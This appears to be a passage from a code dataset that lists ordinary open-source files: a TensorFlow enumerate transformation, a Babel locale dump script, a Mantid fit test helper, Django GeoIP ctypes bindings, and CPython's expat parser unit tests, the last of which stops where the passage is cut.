repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
jalexvig/tensorflow
|
tensorflow/contrib/data/python/ops/enumerate_ops.py
|
41
|
1984
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Enumerate dataset transformations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
def enumerate_dataset(start=0):
"""A transformation that enumerate the elements of a dataset.
It is Similar to python's `enumerate`.
For example:
```python
# NOTE: The following examples use `{ ... }` to represent the
# contents of a dataset.
a = { 1, 2, 3 }
b = { (7, 8), (9, 10) }
# The nested structure of the `datasets` argument determines the
# structure of elements in the resulting dataset.
a.apply(tf.contrib.data.enumerate(start=5)) == { (5, 1), (6, 2), (7, 3) }
b.apply(tf.contrib.data.enumerate()) == { (0, (7, 8)), (1, (9, 10)) }
```
Args:
start: A `tf.int64` scalar `tf.Tensor`, representing the start
value for enumeration.
Returns:
A `Dataset` transformation function, which can be passed to
@{tf.data.Dataset.apply}.
"""
def _apply_fn(dataset):
max_value = np.iinfo(dtypes.int64.as_numpy_dtype).max
return dataset_ops.Dataset.zip((dataset_ops.Dataset.range(start, max_value),
dataset))
return _apply_fn
|
apache-2.0
|
x303597316/hue
|
desktop/core/ext-py/Babel-0.9.6/scripts/dump_data.py
|
40
|
1551
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
from optparse import OptionParser
from pprint import pprint
import sys
from babel.localedata import load, LocaleDataDict
def main():
parser = OptionParser(usage='%prog [options] locale [path]')
parser.add_option('--noinherit', action='store_false', dest='inherit',
help='do not merge inherited data into locale data')
parser.add_option('--resolve', action='store_true', dest='resolve',
help='resolve aliases in locale data')
parser.set_defaults(inherit=True, resolve=False)
options, args = parser.parse_args()
if len(args) not in (1, 2):
parser.error('incorrect number of arguments')
data = load(args[0], merge_inherited=options.inherit)
if options.resolve:
data = LocaleDataDict(data)
if len(args) > 1:
for key in args[1].split('.'):
data = data[key]
if isinstance(data, dict):
data = dict(data.items())
pprint(data)
if __name__ == '__main__':
main()
|
apache-2.0
|
peterfpeterson/mantid
|
Framework/PythonInterface/test/python/plugins/functions/StretchedExpFTTestHelper.py
|
3
|
4706
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
import numpy as np
from scipy import constants
from mantid.simpleapi import Fit, CreateWorkspace, SaveNexus, SaveAscii, EvaluateFunction
from mantid.api import mtd, FunctionFactory
planck_constant = constants.Planck/constants.e*1E15 # meV*psec
def createData(functor, startX=-0.1, endX=0.5, de=0.0004):
"""Generate data for the fit
:param startX: lower boundary for the data, in meV
:param endX: upper boundary for the data, in meV
:param de: energy bin, in meV
"""
energies = np.arange(startX, endX, de)
data = functor(energies)
background = 0.01*max(data)
data += background
errorBars = data*0.1
return CreateWorkspace(energies, data, errorBars, UnitX='DeltaE',
OutputWorkspace="data")
def cleanFit():
"""Removes workspaces created during the fit"""
mtd.remove('data')
mtd.remove('fit_NormalisedCovarianceMatrix')
mtd.remove('fit_Parameters')
mtd.remove('fit_Workspace')
def assertFit(workspace, tg):
"""
:param workspace: data MatrixHistogram
:param tg: dictionary of target fitting parameters
:return:
"""
unacceptable_chi_square = 1.0
msg = ""
for irow in range(workspace.rowCount()):
row = workspace.row(irow)
name = row['Name']
if name == "Cost function value":
chi_square = row['Value']
msg += " chi_square=" + str(chi_square)
elif name == "f0.Tau":
tauOptimal = row['Value']
msg += " tauOptimal=" + str(tauOptimal)
elif name == "f0.Beta":
betaOptimal = row['Value']
msg += " betaOptimal=" + str(betaOptimal)
elif name == "f0.Height":
heightOptimal = row['Value']
msg += " heightOptimal=" + str(heightOptimal)
cleanFit()
beta = tg['beta']
height = tg['height']
check = (chi_square < unacceptable_chi_square) and \
(abs(height - heightOptimal) / height < 0.01) and \
(abs(beta - betaOptimal) < 0.01) and \
(abs(beta - betaOptimal) < 0.01)
return check, msg
def isregistered(function):
status, msg = True, ""
try:
FunctionFactory.createFunction(function)
except RuntimeError as exc:
status, msg = False, 'Could not create {} function: {}'.format(function, str(exc))
return status, msg
def do_fit(tg, fString, shape):
"""
Given a target shape and initial fit function guess, carry out the fit
:param tg: dictionary of target fitting parameters
:param fString: initial guess of the fit function
:param shape: Gaussian or Lorentzian, either integrated or not
:return: success or failure of the fit
"""
if 'Gaussian' in shape:
E0 = planck_constant / tg['tau']
# Analytical Fourier transform of exp(-(t/tau)**2)
functor = lambda E: np.sqrt(np.pi) / E0 * np.exp(-(np.pi*E/E0) ** 2)
elif 'Lorentzian' in shape:
hwhm = planck_constant / (2 * np.pi * tg['tau'])
# Analytical Fourier transform of exp(-t/tau)
functor = lambda E: (1.0 / np.pi) * hwhm / (hwhm ** 2 + E ** 2)
if 'Integrated' in shape:
# when testing function PrimStretchedExpFT
def ifunctor(E):
"""Numerical integral of the functor within each energy bin"""
de = (E[-1]-E[0]) / (len(E)-1.0) # energy spacing
rf = 100 # make the energy domain a grid 100 times finer
efine = np.arange(E[0]-de, E[-1]+2*de, de/rf)
values = functor(efine) # evaluate on the finer grid
primitive = np.cumsum(values) / rf # cummulative sum, giving the integral
# bb are bin boundaries delimiting bins of width de and centered at the E values
bb = (E[1:] + E[:-1]) / 2 # internal bin boundaries
bb = np.insert(bb, 0, 2 * E[0] - bb[0]) # external lower bin boundary
bb = np.append(bb, 2 * E[-1] - bb[-1]) # external upper bin boundary
# return the integral over each energy bin
return np.interp(bb[1:], efine, primitive) - np.interp(bb[:-1], efine, primitive)
createData(ifunctor)
else:
# when testing function StretchedExpFT
createData(functor) # Create workspace "data"
Fit(Function=fString, InputWorkspace="data", MaxIterations=100, Output="fit")
return assertFit(mtd["fit_Parameters"], tg)
|
gpl-3.0
|
aisipos/django
|
django/contrib/gis/geoip/prototypes.py
|
535
|
3943
|
from ctypes import POINTER, Structure, c_char_p, c_float, c_int, string_at
from django.contrib.gis.geoip.libgeoip import free, lgeoip
# #### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` in to accommodate in future when
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
geoip_encodings = {
0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure):
pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
# #### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if result:
# Checking the pointer to the C structure, if valid pull out elements
# into a dictionary.
rec = result.contents
record = {fld: getattr(rec, fld) for fld, ctype in rec._fields_}
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s.decode(GEOIP_DEFAULT_ENCODING)
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
def _err_check(result, func, cargs):
if result:
return result.decode(GEOIP_DEFAULT_ENCODING)
return result
func.restype = c_char_p
func.errcheck = _err_check
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
|
bsd-3-clause
|
munyirik/python
|
cpython/Lib/test/test_pyexpat.py
|
6
|
26058
|
# XXX TypeErrors on calling handlers, or on bad return values from a
# handler, are obscure and unhelpful.
from io import BytesIO
import os
import sysconfig
import unittest
import traceback
from xml.parsers import expat
from xml.parsers.expat import errors
from test.support import sortdict
class SetAttributeTest(unittest.TestCase):
def setUp(self):
self.parser = expat.ParserCreate(namespace_separator='!')
self.set_get_pairs = [
[0, 0],
[1, 1],
[2, 1],
[0, 0],
]
def test_ordered_attributes(self):
for x, y in self.set_get_pairs:
self.parser.ordered_attributes = x
self.assertEqual(self.parser.ordered_attributes, y)
def test_specified_attributes(self):
for x, y in self.set_get_pairs:
self.parser.specified_attributes = x
self.assertEqual(self.parser.specified_attributes, y)
data = b'''\
<?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
<?xml-stylesheet href="stylesheet.css"?>
<!-- comment data -->
<!DOCTYPE quotations SYSTEM "quotations.dtd" [
<!ELEMENT root ANY>
<!ATTLIST root attr1 CDATA #REQUIRED attr2 CDATA #IMPLIED>
<!NOTATION notation SYSTEM "notation.jpeg">
<!ENTITY acirc "â">
<!ENTITY external_entity SYSTEM "entity.file">
<!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
%unparsed_entity;
]>
<root attr1="value1" attr2="value2ὀ">
<myns:subelement xmlns:myns="http://www.python.org/namespace">
Contents of subelements
</myns:subelement>
<sub2><![CDATA[contents of CDATA section]]></sub2>
&external_entity;
&skipped_entity;
\xb5
</root>
'''
# Produce UTF-8 output
class ParseTest(unittest.TestCase):
class Outputter:
def __init__(self):
self.out = []
def StartElementHandler(self, name, attrs):
self.out.append('Start element: ' + repr(name) + ' ' +
sortdict(attrs))
def EndElementHandler(self, name):
self.out.append('End element: ' + repr(name))
def CharacterDataHandler(self, data):
data = data.strip()
if data:
self.out.append('Character data: ' + repr(data))
def ProcessingInstructionHandler(self, target, data):
self.out.append('PI: ' + repr(target) + ' ' + repr(data))
def StartNamespaceDeclHandler(self, prefix, uri):
self.out.append('NS decl: ' + repr(prefix) + ' ' + repr(uri))
def EndNamespaceDeclHandler(self, prefix):
self.out.append('End of NS decl: ' + repr(prefix))
def StartCdataSectionHandler(self):
self.out.append('Start of CDATA section')
def EndCdataSectionHandler(self):
self.out.append('End of CDATA section')
def CommentHandler(self, text):
self.out.append('Comment: ' + repr(text))
def NotationDeclHandler(self, *args):
name, base, sysid, pubid = args
self.out.append('Notation declared: %s' %(args,))
def UnparsedEntityDeclHandler(self, *args):
entityName, base, systemId, publicId, notationName = args
self.out.append('Unparsed entity decl: %s' %(args,))
def NotStandaloneHandler(self):
self.out.append('Not standalone')
return 1
def ExternalEntityRefHandler(self, *args):
context, base, sysId, pubId = args
self.out.append('External entity ref: %s' %(args[1:],))
return 1
def StartDoctypeDeclHandler(self, *args):
self.out.append(('Start doctype', args))
return 1
def EndDoctypeDeclHandler(self):
self.out.append("End doctype")
return 1
def EntityDeclHandler(self, *args):
self.out.append(('Entity declaration', args))
return 1
def XmlDeclHandler(self, *args):
self.out.append(('XML declaration', args))
return 1
def ElementDeclHandler(self, *args):
self.out.append(('Element declaration', args))
return 1
def AttlistDeclHandler(self, *args):
self.out.append(('Attribute list declaration', args))
return 1
def SkippedEntityHandler(self, *args):
self.out.append(("Skipped entity", args))
return 1
def DefaultHandler(self, userData):
pass
def DefaultHandlerExpand(self, userData):
pass
handler_names = [
'StartElementHandler', 'EndElementHandler', 'CharacterDataHandler',
'ProcessingInstructionHandler', 'UnparsedEntityDeclHandler',
'NotationDeclHandler', 'StartNamespaceDeclHandler',
'EndNamespaceDeclHandler', 'CommentHandler',
'StartCdataSectionHandler', 'EndCdataSectionHandler', 'DefaultHandler',
'DefaultHandlerExpand', 'NotStandaloneHandler',
'ExternalEntityRefHandler', 'StartDoctypeDeclHandler',
'EndDoctypeDeclHandler', 'EntityDeclHandler', 'XmlDeclHandler',
'ElementDeclHandler', 'AttlistDeclHandler', 'SkippedEntityHandler',
]
def _hookup_callbacks(self, parser, handler):
"""
Set each of the callbacks defined on handler and named in
self.handler_names on the given parser.
"""
for name in self.handler_names:
setattr(parser, name, getattr(handler, name))
def _verify_parse_output(self, operations):
expected_operations = [
('XML declaration', ('1.0', 'iso-8859-1', 0)),
'PI: \'xml-stylesheet\' \'href="stylesheet.css"\'',
"Comment: ' comment data '",
"Not standalone",
("Start doctype", ('quotations', 'quotations.dtd', None, 1)),
('Element declaration', ('root', (2, 0, None, ()))),
('Attribute list declaration', ('root', 'attr1', 'CDATA', None,
1)),
('Attribute list declaration', ('root', 'attr2', 'CDATA', None,
0)),
"Notation declared: ('notation', None, 'notation.jpeg', None)",
('Entity declaration', ('acirc', 0, '\xe2', None, None, None, None)),
('Entity declaration', ('external_entity', 0, None, None,
'entity.file', None, None)),
"Unparsed entity decl: ('unparsed_entity', None, 'entity.file', None, 'notation')",
"Not standalone",
"End doctype",
"Start element: 'root' {'attr1': 'value1', 'attr2': 'value2\u1f40'}",
"NS decl: 'myns' 'http://www.python.org/namespace'",
"Start element: 'http://www.python.org/namespace!subelement' {}",
"Character data: 'Contents of subelements'",
"End element: 'http://www.python.org/namespace!subelement'",
"End of NS decl: 'myns'",
"Start element: 'sub2' {}",
'Start of CDATA section',
"Character data: 'contents of CDATA section'",
'End of CDATA section',
"End element: 'sub2'",
"External entity ref: (None, 'entity.file', None)",
('Skipped entity', ('skipped_entity', 0)),
"Character data: '\xb5'",
"End element: 'root'",
]
for operation, expected_operation in zip(operations, expected_operations):
self.assertEqual(operation, expected_operation)
def test_parse_bytes(self):
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
parser.Parse(data, 1)
operations = out.out
self._verify_parse_output(operations)
# Issue #6697.
self.assertRaises(AttributeError, getattr, parser, '\uD800')
def test_parse_str(self):
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
parser.Parse(data.decode('iso-8859-1'), 1)
operations = out.out
self._verify_parse_output(operations)
def test_parse_file(self):
# Try parsing a file
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
file = BytesIO(data)
parser.ParseFile(file)
operations = out.out
self._verify_parse_output(operations)
def test_parse_again(self):
parser = expat.ParserCreate()
file = BytesIO(data)
parser.ParseFile(file)
# Issue 6676: ensure a meaningful exception is raised when attempting
# to parse more than one XML document per xmlparser instance,
# a limitation of the Expat library.
with self.assertRaises(expat.error) as cm:
parser.ParseFile(file)
self.assertEqual(expat.ErrorString(cm.exception.code),
expat.errors.XML_ERROR_FINISHED)
class NamespaceSeparatorTest(unittest.TestCase):
def test_legal(self):
# Tests that make sure we get errors when the namespace_separator value
# is illegal, and that we don't for good values:
expat.ParserCreate()
expat.ParserCreate(namespace_separator=None)
expat.ParserCreate(namespace_separator=' ')
def test_illegal(self):
try:
expat.ParserCreate(namespace_separator=42)
self.fail()
except TypeError as e:
self.assertEqual(str(e),
'ParserCreate() argument 2 must be str or None, not int')
try:
expat.ParserCreate(namespace_separator='too long')
self.fail()
except ValueError as e:
self.assertEqual(str(e),
'namespace_separator must be at most one character, omitted, or None')
def test_zero_length(self):
# ParserCreate() needs to accept a namespace_separator of zero length
# to satisfy the requirements of RDF applications that are required
# to simply glue together the namespace URI and the localname. Though
# considered a wart of the RDF specifications, it needs to be supported.
#
# See XML-SIG mailing list thread starting with
# http://mail.python.org/pipermail/xml-sig/2001-April/005202.html
#
expat.ParserCreate(namespace_separator='') # too short
class InterningTest(unittest.TestCase):
def test(self):
# Test the interning machinery.
p = expat.ParserCreate()
L = []
def collector(name, *args):
L.append(name)
p.StartElementHandler = collector
p.EndElementHandler = collector
p.Parse(b"<e> <e/> <e></e> </e>", 1)
tag = L[0]
self.assertEqual(len(L), 6)
for entry in L:
# L should have the same string repeated over and over.
self.assertTrue(tag is entry)
def test_issue9402(self):
# create an ExternalEntityParserCreate with buffer text
class ExternalOutputter:
def __init__(self, parser):
self.parser = parser
self.parser_result = None
def ExternalEntityRefHandler(self, context, base, sysId, pubId):
external_parser = self.parser.ExternalEntityParserCreate("")
self.parser_result = external_parser.Parse(b"", 1)
return 1
parser = expat.ParserCreate(namespace_separator='!')
parser.buffer_text = 1
out = ExternalOutputter(parser)
parser.ExternalEntityRefHandler = out.ExternalEntityRefHandler
parser.Parse(data, 1)
self.assertEqual(out.parser_result, 1)
class BufferTextTest(unittest.TestCase):
def setUp(self):
self.stuff = []
self.parser = expat.ParserCreate()
self.parser.buffer_text = 1
self.parser.CharacterDataHandler = self.CharacterDataHandler
def check(self, expected, label):
self.assertEqual(self.stuff, expected,
"%s\nstuff = %r\nexpected = %r"
% (label, self.stuff, map(str, expected)))
def CharacterDataHandler(self, text):
self.stuff.append(text)
def StartElementHandler(self, name, attrs):
self.stuff.append("<%s>" % name)
bt = attrs.get("buffer-text")
if bt == "yes":
self.parser.buffer_text = 1
elif bt == "no":
self.parser.buffer_text = 0
def EndElementHandler(self, name):
self.stuff.append("</%s>" % name)
def CommentHandler(self, data):
self.stuff.append("<!--%s-->" % data)
def setHandlers(self, handlers=[]):
for name in handlers:
setattr(self.parser, name, getattr(self, name))
def test_default_to_disabled(self):
parser = expat.ParserCreate()
self.assertFalse(parser.buffer_text)
def test_buffering_enabled(self):
# Make sure buffering is turned on
self.assertTrue(self.parser.buffer_text)
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff, ['123'],
"buffered text not properly collapsed")
def test1(self):
# XXX This test exposes more detail of Expat's text chunking than we
# XXX like, but it tests what we need to concisely.
self.setHandlers(["StartElementHandler"])
self.parser.Parse(b"<a>1<b buffer-text='no'/>2\n3<c buffer-text='yes'/>4\n5</a>", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "2", "\n", "3", "<c>", "4\n5"],
"buffering control not reacting as expected")
def test2(self):
self.parser.Parse(b"<a>1<b/><2><c/> \n 3</a>", 1)
self.assertEqual(self.stuff, ["1<2> \n 3"],
"buffered text not properly collapsed")
def test3(self):
self.setHandlers(["StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff, ["<a>", "1", "<b>", "2", "<c>", "3"],
"buffered text not properly split")
def test4(self):
self.setHandlers(["StartElementHandler", "EndElementHandler"])
self.parser.CharacterDataHandler = None
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff,
["<a>", "<b>", "</b>", "<c>", "</c>", "</a>"])
def test5(self):
self.setHandlers(["StartElementHandler", "EndElementHandler"])
self.parser.Parse(b"<a>1<b></b>2<c/>3</a>", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "3", "</a>"])
def test6(self):
self.setHandlers(["CommentHandler", "EndElementHandler",
"StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c></c>345</a> ", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "345", "</a>"],
"buffered text not properly split")
def test7(self):
self.setHandlers(["CommentHandler", "EndElementHandler",
"StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c></c>3<!--abc-->4<!--def-->5</a> ", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "3",
"<!--abc-->", "4", "<!--def-->", "5", "</a>"],
"buffered text not properly split")
# Test handling of exception from callback:
class HandlerExceptionTest(unittest.TestCase):
def StartElementHandler(self, name, attrs):
raise RuntimeError(name)
def check_traceback_entry(self, entry, filename, funcname):
self.assertEqual(os.path.basename(entry[0]), filename)
self.assertEqual(entry[2], funcname)
def test_exception(self):
parser = expat.ParserCreate()
parser.StartElementHandler = self.StartElementHandler
try:
parser.Parse(b"<a><b><c/></b></a>", 1)
self.fail()
except RuntimeError as e:
self.assertEqual(e.args[0], 'a',
"Expected RuntimeError for element 'a', but" + \
" found %r" % e.args[0])
# Check that the traceback contains the relevant line in pyexpat.c
entries = traceback.extract_tb(e.__traceback__)
self.assertEqual(len(entries), 3)
self.check_traceback_entry(entries[0],
"test_pyexpat.py", "test_exception")
self.check_traceback_entry(entries[1],
"pyexpat.c", "StartElement")
self.check_traceback_entry(entries[2],
"test_pyexpat.py", "StartElementHandler")
if sysconfig.is_python_build():
self.assertIn('call_with_frame("StartElement"', entries[1][3])
# Test Current* members:
class PositionTest(unittest.TestCase):
def StartElementHandler(self, name, attrs):
self.check_pos('s')
def EndElementHandler(self, name):
self.check_pos('e')
def check_pos(self, event):
pos = (event,
self.parser.CurrentByteIndex,
self.parser.CurrentLineNumber,
self.parser.CurrentColumnNumber)
self.assertTrue(self.upto < len(self.expected_list),
'too many parser events')
expected = self.expected_list[self.upto]
self.assertEqual(pos, expected,
'Expected position %s, got position %s' %(pos, expected))
self.upto += 1
def test(self):
self.parser = expat.ParserCreate()
self.parser.StartElementHandler = self.StartElementHandler
self.parser.EndElementHandler = self.EndElementHandler
self.upto = 0
self.expected_list = [('s', 0, 1, 0), ('s', 5, 2, 1), ('s', 11, 3, 2),
('e', 15, 3, 6), ('e', 17, 4, 1), ('e', 22, 5, 0)]
xml = b'<a>\n <b>\n <c/>\n </b>\n</a>'
self.parser.Parse(xml, 1)
class sf1296433Test(unittest.TestCase):
def test_parse_only_xml_data(self):
# http://python.org/sf/1296433
#
xml = "<?xml version='1.0' encoding='iso8859'?><s>%s</s>" % ('a' * 1025)
# this one doesn't crash
#xml = "<?xml version='1.0'?><s>%s</s>" % ('a' * 10000)
class SpecificException(Exception):
pass
def handler(text):
raise SpecificException
parser = expat.ParserCreate()
parser.CharacterDataHandler = handler
self.assertRaises(Exception, parser.Parse, xml.encode('iso8859'))
class ChardataBufferTest(unittest.TestCase):
"""
test setting of chardata buffer size
"""
def test_1025_bytes(self):
self.assertEqual(self.small_buffer_test(1025), 2)
def test_1000_bytes(self):
self.assertEqual(self.small_buffer_test(1000), 1)
def test_wrong_size(self):
parser = expat.ParserCreate()
parser.buffer_text = 1
def f(size):
parser.buffer_size = size
self.assertRaises(ValueError, f, -1)
self.assertRaises(ValueError, f, 0)
def test_unchanged_size(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><s>" + b'a' * 512
xml2 = b'a'*512 + b'</s>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_size = 512
parser.buffer_text = 1
# Feed 512 bytes of character data: the handler should be called
# once.
self.n = 0
parser.Parse(xml1)
self.assertEqual(self.n, 1)
# Reassign to buffer_size, but assign the same size.
parser.buffer_size = parser.buffer_size
self.assertEqual(self.n, 1)
# Try parsing rest of the document
parser.Parse(xml2)
self.assertEqual(self.n, 2)
def test_disabling_buffer(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a>" + b'a' * 512
xml2 = b'b' * 1024
xml3 = b'c' * 1024 + b'</a>';
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 1024
self.assertEqual(parser.buffer_size, 1024)
# Parse one chunk of XML
self.n = 0
parser.Parse(xml1, 0)
self.assertEqual(parser.buffer_size, 1024)
self.assertEqual(self.n, 1)
# Turn off buffering and parse the next chunk.
parser.buffer_text = 0
self.assertFalse(parser.buffer_text)
self.assertEqual(parser.buffer_size, 1024)
for i in range(10):
parser.Parse(xml2, 0)
self.assertEqual(self.n, 11)
parser.buffer_text = 1
self.assertTrue(parser.buffer_text)
self.assertEqual(parser.buffer_size, 1024)
parser.Parse(xml3, 1)
self.assertEqual(self.n, 12)
def counting_handler(self, text):
self.n += 1
def small_buffer_test(self, buffer_len):
xml = b"<?xml version='1.0' encoding='iso8859'?><s>" + b'a' * buffer_len + b'</s>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_size = 1024
parser.buffer_text = 1
self.n = 0
parser.Parse(xml)
return self.n
def test_change_size_1(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a><s>" + b'a' * 1024
xml2 = b'aaa</s><s>' + b'a' * 1025 + b'</s></a>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 1024
self.assertEqual(parser.buffer_size, 1024)
self.n = 0
parser.Parse(xml1, 0)
parser.buffer_size *= 2
self.assertEqual(parser.buffer_size, 2048)
parser.Parse(xml2, 1)
self.assertEqual(self.n, 2)
def test_change_size_2(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a>a<s>" + b'a' * 1023
xml2 = b'aaa</s><s>' + b'a' * 1025 + b'</s></a>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 2048
self.assertEqual(parser.buffer_size, 2048)
self.n=0
parser.Parse(xml1, 0)
parser.buffer_size = parser.buffer_size // 2
self.assertEqual(parser.buffer_size, 1024)
parser.Parse(xml2, 1)
self.assertEqual(self.n, 4)
class MalformedInputTest(unittest.TestCase):
def test1(self):
xml = b"\0\r\n"
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(str(e), 'unclosed token: line 2, column 0')
def test2(self):
# \xc2\x85 is UTF-8 encoded U+0085 (NEXT LINE)
xml = b"<?xml version\xc2\x85='1.0'?>\r\n"
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(str(e), 'XML declaration not well-formed: line 1, column 14')
class ErrorMessageTest(unittest.TestCase):
def test_codes(self):
# verify mapping of errors.codes and errors.messages
self.assertEqual(errors.XML_ERROR_SYNTAX,
errors.messages[errors.codes[errors.XML_ERROR_SYNTAX]])
def test_expaterror(self):
xml = b'<'
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(e.code,
errors.codes[errors.XML_ERROR_UNCLOSED_TOKEN])
class ForeignDTDTests(unittest.TestCase):
"""
Tests for the UseForeignDTD method of expat parser objects.
"""
def test_use_foreign_dtd(self):
"""
If UseForeignDTD is passed True and a document without an external
entity reference is parsed, ExternalEntityRefHandler is first called
with None for the public and system ids.
"""
handler_call_args = []
def resolve_entity(context, base, system_id, public_id):
handler_call_args.append((public_id, system_id))
return 1
parser = expat.ParserCreate()
parser.UseForeignDTD(True)
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(b"<?xml version='1.0'?><element/>")
self.assertEqual(handler_call_args, [(None, None)])
# test UseForeignDTD() is equal to UseForeignDTD(True)
handler_call_args[:] = []
parser = expat.ParserCreate()
parser.UseForeignDTD()
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(b"<?xml version='1.0'?><element/>")
self.assertEqual(handler_call_args, [(None, None)])
def test_ignore_use_foreign_dtd(self):
"""
If UseForeignDTD is passed True and a document with an external
entity reference is parsed, ExternalEntityRefHandler is called with
the public and system ids from the document.
"""
handler_call_args = []
def resolve_entity(context, base, system_id, public_id):
handler_call_args.append((public_id, system_id))
return 1
parser = expat.ParserCreate()
parser.UseForeignDTD(True)
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(
b"<?xml version='1.0'?><!DOCTYPE foo PUBLIC 'bar' 'baz'><element/>")
self.assertEqual(handler_call_args, [("bar", "baz")])
